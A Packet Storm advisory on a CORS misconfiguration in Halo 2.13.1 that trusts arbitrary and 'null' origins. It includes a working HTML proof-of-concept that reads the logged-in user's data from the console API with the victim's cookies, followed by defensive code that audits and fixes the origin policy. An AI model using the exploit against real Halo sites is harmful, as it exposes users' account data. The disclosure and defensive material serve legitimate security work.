packetstorm | Nu11secur1ty | PACKETSTORM:177609
History: Mar 15, 2024 - 12:00 a.m.

HALO 2.13.1 CORS Issue


AI Score: 7.4 High (Confidence: Low)

`## Title: HALO-2.13.1 Cross-origin resource sharing: arbitrary origin trusted  
## Author: nu11secur1ty  
## Date: 03/15/2024  
## Vendor: https://www.halo.run/  
## Software: https://github.com/halo-dev/halo  
## Reference: https://portswigger.net/web-security/cors  
  
## Description:  
The application implements an HTML5 cross-origin resource sharing  
(CORS) policy for this request that allows access from any domain.  
The application allowed access from the requested origin null.  
The application allows two-way interaction from the null origin. This  
effectively means that any domain can perform two-way interaction by  
causing the browser to submit the null origin, for example by issuing  
the request from a sandboxed iframe or a malicious phishing domain with a  
specially crafted HTML exploit.  
  
STATUS: HIGH - Vulnerability  
  
[+]Exploit:  
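```HTML  
<html>  
<body>  
<center>  
<h2>CORS POC Exploit</h2>  
<h3>Extract SID</h3>  
  
<div id="demo">  
<button type="button" onclick="cors()">Exploit Click here</button>  
</div>  
</center>  
  
<script>  
function cors() {  
  var xhttp = new XMLHttpRequest();  
  xhttp.onreadystatechange = function() {  
    // readyState 4 = request finished; the body is readable here only  
    // because the server's CORS policy trusts this page's origin.  
    if (this.readyState == 4 && this.status == 200) {  
      // alert() returns undefined, so the response text appears in the dialog.  
      document.getElementById("demo").innerHTML = alert(this.responseText);  
    }  
  };  
  xhttp.open("GET",  
    "http://192.168.100.49:8090/apis/api.console.halo.run/v1alpha1/users/-",  
    true);  
  // Send the victim's session cookies with the cross-origin request.  
  xhttp.withCredentials = true;  
  xhttp.send();  
}  
</script>  
  
</body>  
</html>  
  
```  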
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/HALO/2024/HALO-2.13.1)  
  
## Proof and Exploit:  
[href](https://www.nu11secur1ty.com/2024/03/halo-2131-cross-origin-resource-sharing.html)  
  
## Time spent:  
00:25:00  
  
  
--   
System Administrator - Infrastructure Engineer  
Penetration Testing Engineer  
Exploit developer at https://packetstormsecurity.com/  
https://cve.mitre.org/index.html  
https://cxsecurity.com/ and https://www.exploit-db.com/  
0day Exploit DataBase https://0day.today/  
home page: https://www.nu11secur1ty.com/  
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=  
nu11secur1ty <http://nu11secur1ty.com/>  
  
  
`
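
The issue described in the advisory comes down to how the server answers the Origin request header on credentialed requests. As an added example (not code from the advisory or from Halo), the sketch below models the reflecting behaviour beside an exact-match allowlist and audits both; the allowlist entry and the probe origins are constructed placeholders.

```javascript
// Added illustration: models the server-side Origin decision, not Halo's own code.
// ALLOWED_ORIGINS is a constructed allowlist; substitute the console's real origin.
const ALLOWED_ORIGINS = new Set(["https://console.example.test"]);

// Weak policy matching the advisory's description: whatever Origin arrives
// (including the literal string "null") is echoed back with credentials enabled.
function reflectingPolicy(origin) {
  if (!origin) return {};
  return {
    "Access-Control-Allow-Origin": origin,
    "Access-Control-Allow-Credentials": "true",
  };
}

// Hardened policy: exact-match allowlist; "null" and unknown origins get no
// CORS grant, and Vary: Origin keeps caches from mixing per-origin responses.
function allowlistPolicy(origin) {
  if (!origin || origin === "null" || !ALLOWED_ORIGINS.has(origin)) {
    return { Vary: "Origin" };
  }
  return {
    "Access-Control-Allow-Origin": origin,
    "Access-Control-Allow-Credentials": "true",
    Vary: "Origin",
  };
}

// Audit: probe a policy with untrusted Origin values and report every case in
// which a browser would let that origin read a credentialed response.
function auditCors(policy) {
  const probes = ["null", "https://untrusted.example.test"]; // constructed probes
  const findings = [];
  for (const origin of probes) {
    const headers = policy(origin);
    const acao = headers["Access-Control-Allow-Origin"];
    const creds = headers["Access-Control-Allow-Credentials"] === "true";
    // Browsers reject "*" with credentials, so only an exact echo is readable.
    if (creds && acao === origin) {
      findings.push(`credentialed read allowed for Origin: ${origin}`);
    }
  }
  return findings;
}

console.log("reflecting:", auditCors(reflectingPolicy));
console.log("allowlist: ", auditCors(allowlistPolicy));
```

The same two probes can be sent to a deployed instance during a configuration review; any response that echoes the probe origin together with Access-Control-Allow-Credentials: true is a finding.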
